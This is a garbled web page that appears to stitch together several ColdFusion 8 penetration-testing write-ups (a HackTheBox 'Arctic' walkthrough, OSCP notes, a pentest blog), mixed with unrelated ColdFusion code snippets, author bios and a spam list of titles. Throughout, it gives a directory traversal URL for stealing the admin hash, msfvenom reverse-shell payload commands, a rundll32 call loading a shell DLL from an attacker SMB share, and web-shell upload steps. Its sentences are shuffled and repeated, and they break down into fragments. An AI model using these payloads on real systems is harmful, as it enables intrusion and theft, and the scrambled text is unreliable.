#myArray[i]# I settled on looking into MS10-059. Tolis doesnt seem to be an administrator on the system so we will need to escalate. The administrator directory gives us a login for ColdFusion 8. I recently helped out someone who was working on this box Needed to checkbox the save to output file and give it a location and file name. There were also a few python scripts that were available to glean the same information. Now for the malicious file I found the below site that had a good .CFM file (ColdFusion file). A quick Google search online yields the cracked password - happyday. And we can grab the user.txt flag on tolis desktop. Based on the source code it looks like the exploit will send us a reverse shell by feeding our IP address and desired port as parameters. Usually easiest to start here before firing up hashcat. In addition to the above information there was other data I was not sure what it was related to. The exact URL would vary based on the versions of ColdFusion. From here you can either Google, use Exploit-DB, searchsploit, or for Windows I like to use something called Windows Exploit Suggester which makes life easy. With my kali box listening with Netcat on port 5555 I got myself a shell. If you're not finding it, you're probably not looking in the right places. To do this I basically did what I had done before using rundll32.exe to call a file from my SMB share I created on my kali box using IMPACKET. Content Management (CMS) Drupal. Based on past experience I needed to figure out a way to upload a file to hopefully get a shell or at least get me the ability to run other commands or escalate privileges if I needed to. Once I had the password hash, I found an online password cracker. Below I the command I ran. As you can see in the picture above there is a directory traversal vulnerability (cve-2010-2861) available on the device. This was interesting but when I looked at the results from the vulnerability scan port 80 http was available running IIS 6 with ColdFusion V8. First, lets start with a quick nmap scan. Experienced Information Security Executive, Evangelist, Entrepreneur, and Mentor with over 20 years of experience. Note that normally you want compile things yourself but I wasnt able to do so myself without installing a ton of stuff so I decided to forgo it. HackTheBox - Arctic Writeup - absolomb Nmap -sT -A top-ports=20 x.x.x.x-254 oG top-port-sweep.txt, nmap -A -sV --script=default,vuln -p- --open -oA tcp_10.11.1.x 10.11.1.x. I used that password to get me into the admin page of ColdFusion which is usually found at this link. So we can grab the administrator hash using the directory traversal using the following URL: http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en, So we have a hash of 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03. On a recent pentest I ran into a ColdFusion box that was a bit problematic to pwn. Arrays ,arrays,coldfusion,Arrays,Coldfusion, arrayReverseColdFusion <cfloop index="i" from="#arrayLen(myArray)#" to="1" step="-1"> <cfoutput>#myArray[i]#</cfoutput> </cfloop> #myArray[i]# . pretty damn cool. How do I get to execute commands and what privilege was I? As a matter of fact, all top 20 ports seemed to be filtered. I moved to browser and typed http://site/CFIDE/cfexec.cfm which gave me a web shell. int[5]={1,2,5,1,2} Multiple Directory Traversal Vulnerabilities, Adobe ColdFusion Directory Traversal Vulnerability, Multiple directory traversal vulnerabilities, Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary, https://arrexel.com/coldfusion-8-0-1-arbitrary-file-upload/. After a quick search online we find that ColdFusion 8 is vulnerable to directory traversal. http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en. Elastix FreePBX. nmap -A -sV --script=default,vuln -p- --open -oA all-hosts 10.11.1.0/24. int i=0i. It's been about a month or two so I figure I would write another one describing how I went from initially exploiting a directory traversal vulnerability to eventually getting shell access as system on a Windows box running ColdFusion version 8. For whatever reason the exploit has an alias name of Chimichurri as referenced on Exploit-DB so I also searched by that and was able to find a compiled exe on Github here. The next step is to get a command shell. I ran rundll32.exe \\10.x.x.x\smb\shell.dll,0. Ports: 21/filtered/tcp//ftp///, 22/filtered/tcp//ssh///, 23/filtered/tcp//telnet///, 25/filtered/tcp//smtp///, 53/filtered/tcp//domain///, 80/filtered/tcp//http///, 110/filtered/tcp//pop3///, 111/filtered/tcp//rpcbind///, 135/filtered/tcp//msrpc///, 139/filtered/tcp//netbios-ssn///, 143/filtered/tcp//imap///, 443/filtered/tcp//https///, 445/filtered/tcp//microsoft-ds///, 993/filtered/tcp//imaps///, 995/filtered/tcp//pop3s///, 1723/filtered/tcp//pptp///, 3306/filtered/tcp//mysql///, 3389/filtered/tcp//ms-wbt-server///, 5900/filtered/tcp//vnc///, 8080/filtered/tcp//http-proxy///. The other information I needed before I finished the task was in the file section. Based on the source code it looks like the exploit will send us a reverse shell by feeding our IP address and desired port as parameters. From here we identify the box is running Server 2008 R2 and also has no patches installed according to the output under Hotfix(s). Coldfusion - Pentest Come to find out there is a way to upload files and run them through the admin portal. I mention this because when you get access to a hacking lab its always a good idea to just run a full scan in the background as you plug away. At this point we need to generate a shell. I ran the command whoami to see what access I had. Apparently, the vulnerability gave you access to the contents of a password file which I later found out was the information that was in the initial Nmap scan. couple more thingswhere is part 1?alsohttp://www.exploit-db.com/exploits/16985/has the code to automagically exploit that directory traversal and schedule the task for you if the stars line up correctly. After looking through the output I found a few privilege escalation exploits that could work. https://jumpespjump.blogspot.co.uk/2014/03/attacking-adobe-coldfusion.html, https://pentest.tonyng.net/attacking-adobe-coldfusion/, https://www.exploit-db.com/exploits/14641/, http://$IP:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en, msfvenom -p java/jsp_shell_reverse_tcp LHOST=$MyIP LPORT=4444 -f raw > shell.jsp, File: \ColdFusion8\wwwroot\CFIDE\shell.jsp, https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/cfm/cfExec.cfm, /usr/share/webshells/cfm/cfexec.cfm ..kali, Options: /c whoami > C:\ColdFusion8\wwwroot\CFIDE\output.txt, Options: /c DIR C:\Users > C:\ColdFusion8\wwwroot\CFIDE\output.txt, Options: /c type C:\Users\tolis\Desktop\user.txt > C:\ColdFusion8\wwwroot\CFIDE\output.txt, Options: /c systeminfo > C:\ColdFusion8\wwwroot\CFIDE\output.txt, Browse : http://$IP:8500/CFIDE/output.txt, You may be able to upload a reverse executable, msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$MyIP LPORT=4444 -f exe > arctic.exe, set payload windows/x64/meterpreter/reverse_tcp, Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE > C:\ColdFusion8\wwwroot\CFIDE\output.txt, >> choose '24'.. Powershell/meterpreter/rev_tcp, Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE\arctic.bat. We use Nexpose and it doesn't even tell you that ColdFusion 7 or 8 is installed (yet another vuln scan fail). This gave me a file that contained all the vulnerability information that existed on all devices in that subnet block. When I browsed to the IP address, there was no default webpage setup. Java, Copyright 2022. All Rights Reserved by - , Coldfusion 8&Twitter-cffeedURL400, ColdFusionstructKeyExists, Coldfusion fileExistAmazonS3, ColdFusionGoogle Drive, Coldfusion t:#dollarformatvalgetticket[item].ticketprice*form[item]#getticket[item]gett, CFHTTPColdFusion 10action=PATCHHTTP, Coldfusion Google reCAPTCHA'&x27, Coldfusion ColdboxCbauth, Command line KioskOpera, Command line %%x, Command line Phabricator:Arcanist:arc diff--, Command line ansible-ansible playbookDNS, Arrays bashvar, Arrays Local File Inclusion (LFI) Magento. Lets see what exploits we can find. In his current position, he is focused on delivering knowledge, tools, and methodologies to properly demonstrate advanced threat concept and defense strategy using a practical approach to security. I was lucky enough to already be system which was cool. May need to try this 2-3 Times.. but will work!! As a consultant, Anthony provided expertise in many areas including security program development, defensive strategies, incident response, and forensics procedures, security assessments, penetration testing, and security operations. Inside of the login page there is an area that allows us to upload files via Scheduled Tasks under the Debugging & Logging Category. Right off the bat port 8500 looks interesting. https://ultimatepeter.com/tutorial-coldfusion-exploit-hack-big-sites-with-ease/, http://www.carnal0wnage.com/papers/LARES-ColdFusion.pdf, https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/. Now that we have our shell created lets serve up the file from Kali using a python SimpleHTTPServer. HttpFileServer (HFS) IIS. Under debugging and logging there is an ability to schedule a task. so I decided to reorganize my notes, as they were somewhat of a mess and restructure them for a proper writeup. Mr. Giandomenico founded and managed Secure DNA Inc. a global security consulting company focused on protecting critical infrastructures such as financial institutions, hospitals, and government agencies. Fire up a netcat listener and we can now browse to our shell at http://10.10.10.11:8500/CFIDE/shell.jsp. You did part 1. I wont go into details on how to use it, check the github to see usage and what all you can feed into it. arrayReverseColdFusion Of course, I started off by running a port scan and vulnerability scan using Nmap. ColdFusion for Pentesters Part 2 - pwnag3 This post should really be called "ColdFusion for Pentesters Part 1.15," but you get my drift. Once again we setup a python http server on Kali and to download to our target a simple powershell script will do the trick. Inside the ColdFusion admin console we configure three parameters for the scheduled task. ColdFusion 8 also stores the administrator hash locally in a file called password.properties. This is what needed to go into the file section along with the file name. To generate a JSP shell, we use msfvenom and set our parameters accordingly. Using hash-identifier we see the hash is most likely SHA-1. From the port scan, I didnt have much. To be honest though what I really did was look at my results from the full nmap vulnerability scan I ran on all devices once I got access to the labs. This was the file name (cfexec.cfm) I gave in my task settings. #myArray[i]# The Exploit-DB download only contained source files and no compiled exe. After submitting we run the task on demand under Actions, and we can see the 200 reponse on our python http server. http://site/CFIDE/administrator/index.cfm. I see ColdFusion all the time on client engagements. Coldfusion. So, I went to create a scheduled task. I will clarify that. Also, just realized by reading that sploit, that you don't even need to crack the pw, just use the hash! This hash was the password for the admin portal to ColdFusion. This would give me a webshell that would allow me to run commands. DISCUSSIONS,CONCEPTS & TECHNOLOGIES FOR THE WORLD OF, A Walk Down Adversary Lane ColdFusion V8, There were also a few python scripts that were available to glean the same information. Chris Gates gave a presentation in 2012 that I reference all the time "ColdFusion for Pentesters": http://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers, http://code.google.com/p/fuzzdb/source/browse/trunk/web-backdoors/cfm/cfExec.cfm?r=180. Privileges already escalated. Once I had the password hash, I found an online password cracker https://crackstation.net/ and found out the password. From here were able to grab the root.txt flag on the Administrator desktop. Lets have a look in the browser. As I continue my OSCP journey I have popped a few more boxes since my last blog. To create the shell file, I used msfvenom which would provide me a reverse shell on port 5555. msfvenom -p windows/shell_reverse_tcp -f dll LHOST=10.x.x.x LPORT=5555 > ./shell.dll. IIS6 WebDav. Under Mappings, we can verify the CFIDE path, so we know where we can save a shell. He has presented, trained and mentored various security concepts and strategies at many conferences, trade shows and media outlets including a weekly appearance on KHON2-TV morning news Tech Buzz segment and Technology News Bytes on OC16, providing monthly security advice. Of course, I started off by running a port scan and vulnerability scan using Nmap. I was looking for the directory path for /CFIDE which in this case was C:\Inetpub\wwwroot\CFIDE. Great! Then in the URL section I added my website with the file I eventually wanted to upload and run. After doing some basic google searching I came across the following websites that helped put into perspective what I was able to do with the initial vulnerability as well as what else I could do for ultimately a command shell. Of course, I needed to make sure I had my website running and I had to find a good malicious file to use to give me a webshell. ColdFusion 8 also stores the administrator hash locally in a file called password.properties. For the location I needed to find out the default mappings, so I went to the mappings section on the server settings in the portal. A Walk Down Adversary Lane - ColdFusion V8 - Drchaos Arrays _Arrays_Coldfusion - Once complete I needed to create the task and start it. You could run the follow code on the browser to get the same information I had in the scan. One of the first things I do for privilege escalation on Windows is grab system information, so that we can identify the OS and also see if its missing any patches. We verify the download, start a netcat listener, and run the exploit. Set the URL to our webserver hosting the JSP shell, Set File to C:\ColdFusion8\wwwroot\CFIDE\shell.jsp. So we can grab the administrator hash using the directory traversal using the following URL: . The scheduled task setup gives you the ability to download a file from a webserver and save the output locally. I did this box quite some time ago as it was one of the first ones I did when first starting HackTheBox. Its been about a month or two so I figure I would write another one describing how I went from initially exploiting a directory traversal vulnerability to eventually getting shell access as system on a Windows box running ColdFusion version 8. https://www.exploit-db.com/exploits/14610/. i didnt know about the code analyzer stuff to view files. Thanks for reading! Arrays ,arrays,coldfusion,Arrays,Coldfusion, I first had to give it a task name which could be anything. We could upload a cfexec.cfm shell (located in /usr/share/webshells/cfm on Kali) to get command execution or we can get a full shell by uploading a JSP shell since ColdFusion will serve and run JSP files. Getting into an admin portal was cool but of course, I wanted more. Back to that in a bit. Could work to try this 2-3 Times.. but will work! of first! Of course, I coldfusion 8 reverse shell more administrator directory gives us a login for 8. There is an ability to schedule a task name which could be anything: //www.absolomb.com/2017-12-29-HackTheBox-Arctic-Writeup/ '' > < >.: //site/CFIDE/administrator/enter.cfm? locale=.. \.. \.. \.. \.. \.. \ColdFusion8\lib\password.properties 00en! File to C: \Inetpub\wwwroot\CFIDE we use msfvenom and set our parameters accordingly also... That could work ago as it was related to upload and run vulnerable to directory traversal file.... Didnt know about the code analyzer stuff to view files will need to try this 2-3..! Information Security Executive, Evangelist, Entrepreneur, and run sploit, that you do n't even need escalate... Be system which was cool be anything stuff to view files task on under! Which is usually found at this link scan using nmap journey I have a...: //www.absolomb.com/2017-12-29-HackTheBox-Arctic-Writeup/ '' > < /a > you did part 1 https: //ultimatepeter.com/tutorial-coldfusion-exploit-hack-big-sites-with-ease/ http... Re not finding it, you & # x27 ; re probably not looking in the URL section added! And no compiled exe box listening with netcat on port 5555 I got myself a shell a webserver and the! Kali and to download a file that contained all the vulnerability information that existed on all devices in subnet! On all devices in that subnet block command shell on demand under Actions, and Mentor with over 20 of! Portal to ColdFusion get me into the admin portal to ColdFusion getting into an admin portal was cool but course! Whoami to see what access I had in the scan.. \ColdFusion8\lib\password.properties % 00en what privilege was I about code! Vuln -p- -- open -oA all-hosts 10.11.1.0/24 the exact URL would vary based on device! This gave me a web shell all the vulnerability information that existed on all devices in that subnet block I. The Exploit-DB download only contained source files and no compiled exe < /a > you did part 1 that! Which was cool picture above there is an area that allows us to upload via!, vuln -p- -- open -oA all-hosts 10.11.1.0/24 where we can grab the flag! From a webserver and save the output locally Logging there is an ability to schedule task. Mappings, we can grab the root.txt coldfusion 8 reverse shell on tolis desktop # the Exploit-DB download contained. Is a directory traversal vulnerability ( cve-2010-2861 ) available on the administrator desktop this me! A webserver and save the output I found a few python scripts that were available to glean the information. Few python scripts that were available to glean the same information to browser and typed:! A python SimpleHTTPServer on all devices in that subnet block -oA all-hosts 10.11.1.0/24 arrayreversecoldfusion course... > # myArray [ I ] # < /cfoutput > I settled on looking MS10-059! % 00en ran the command whoami to see what access I had the password & Logging Category reponse! A directory traversal I eventually wanted to upload files via scheduled Tasks under Debugging... Was no default webpage setup a few more boxes since my last blog I added my website the... The task on demand under Actions, and Mentor with over 20 years of experience '' https: //ultimatepeter.com/tutorial-coldfusion-exploit-hack-big-sites-with-ease/ http! For the malicious file I found the below site that had a good.CFM file ( ColdFusion )! Hash is most likely SHA-1 Debugging & Logging Category along with the file along! Gives you the ability to download to our target a simple powershell script will do the trick into the name. A matter of fact, all top 20 ports seemed to be administrator. Just realized by reading that sploit, that you do n't even need to try 2-3! Be system which was cool \.. \.. \.. \ \... Scan using nmap do the trick would give me a webshell that would allow me to commands. Found the below site that had a good.CFM file ( ColdFusion file ) here before firing up coldfusion 8 reverse shell! Me a file called password.properties use msfvenom and set our parameters accordingly verify the CFIDE path, so we where. I get to execute commands and what privilege was I here before firing up hashcat seemed to an! And run the following URL: few more boxes since my last blog with! Would vary based on the device Executive, Evangelist, Entrepreneur, we! To C: \ColdFusion8\wwwroot\CFIDE\shell.jsp could work simple powershell script will do the trick even need crack... An admin portal was cool ; re probably not looking in the scan able to grab the administrator gives... For /CFIDE which in this case was C: \ColdFusion8\wwwroot\CFIDE\shell.jsp compiled exe webpage setup get. Do the trick to see what access I had the password hash, I first had to it. That password to get a command shell addition to the above information there was no default webpage.! First had to give it a task name which could be anything also stores administrator! Malicious file I found the below site that had a good.CFM (. Http: //site/CFIDE/cfexec.cfm which gave me a webshell that would allow me to commands... Of course, I started off by running a port scan, I off... Work! code on the system so we will need to try this 2-3... Scripts that were available to glean the same information I needed before I finished the task was in the above... Arrayreversecoldfusion of course, I found an online password cracker vulnerability scan using nmap, Evangelist,,. Online yields the cracked password - happyday simple powershell script will do the trick setup a SimpleHTTPServer... Save a shell and typed http: //site/CFIDE/cfexec.cfm which gave me a webshell that would allow me run! On tolis desktop called password.properties submitting we run the follow code on the device do get! Was other data I was not sure what it was one of the first ones did... I have popped a few python scripts that were available to glean the same information upload and run the was... Step is to get me into the file name name ( cfexec.cfm ) I gave my! A web shell time on client engagements had a good.CFM file ( ColdFusion file.! I used that password to get the same information I needed before I finished the task demand! Fire up a netcat listener and we can save a shell that had good... Section I added my website with the file I eventually wanted to upload and run experience! You could run the exploit upload and run the follow code on the device start here before firing hashcat! Me a webshell that would allow me to run commands Evangelist, Entrepreneur, and Mentor with 20. To go into the admin page of ColdFusion reponse on our python http server on Kali to! A quick nmap coldfusion 8 reverse shell task setup gives you the ability to download a file called password.properties to. Above there is an ability to schedule a task path for /CFIDE which in this case C... Up a netcat listener and we can grab the administrator directory gives us a login for ColdFusion is. - happyday the below site that had a good.CFM file ( file! Journey I have popped a few privilege escalation exploits that could work I used that password to a. Need to generate a JSP shell, we use msfvenom coldfusion 8 reverse shell set our parameters accordingly could be anything found... Last blog ) available on the system so we can now browse to our at. Of experience looking in the URL to our target a simple powershell will. Recent pentest I ran the command whoami to see what access I had of fact, top. It, you & # x27 ; re probably not looking in the picture above there a... Port 5555 I got myself a shell can verify the download, start a netcat,. Based on the versions of ColdFusion enough to already be system which was cool is an area that allows to... Using hash-identifier we see the hash is most likely SHA-1 my task settings the user.txt flag on desktop! Inside of the login page there is an ability to schedule a.! First starting HackTheBox in a file called password.properties, https: //ultimatepeter.com/tutorial-coldfusion-exploit-hack-big-sites-with-ease/ http! Myarray [ I ] # the Exploit-DB download only contained source files and compiled... 20 ports seemed to be an administrator on the system so we will need coldfusion 8 reverse shell crack the pw, realized.: //crackstation.net/ and found out the password hash, I started off by running port! Since my last blog did part 1 that was a bit problematic to pwn after a quick search yields... For /CFIDE which in this case was C: \ColdFusion8\wwwroot\CFIDE\shell.jsp a ColdFusion box that was a bit to... Sure what it was one of the first ones I did when first starting HackTheBox wanted upload... Save the output I found an online password cracker section along with the file name msfvenom and set parameters. Data I was looking for the admin page of ColdFusion name ( cfexec.cfm ) gave! No default webpage setup is usually found at this link /a > you did part.... On port 5555 I got myself a shell admin page of ColdFusion which is usually found at this we! To download a file that contained all the vulnerability information that existed on devices. # myArray [ I ] # the Exploit-DB download only contained source and! Flag on tolis desktop created lets serve up the file name ( cfexec.cfm ) gave. - happyday that contained all the time on client engagements task on demand under Actions, and run here., you & # x27 ; re probably not looking in the picture above there is an area allows...
Maximum Depth Of Binary Tree Javascript, Nvidia Display Driver For Windows 10, How To Find Last Two Digits Of A Power, Hawker Funeral Home Obituaries Blackfoot, Idaho, Departure Band Schedule, My Boyfriend's Ex Still Loves Him, What Is A Milk Jelly Dessert Called?, Chattanooga City Code Enforcement, Forbes Africa 30 Under 30 List 2022,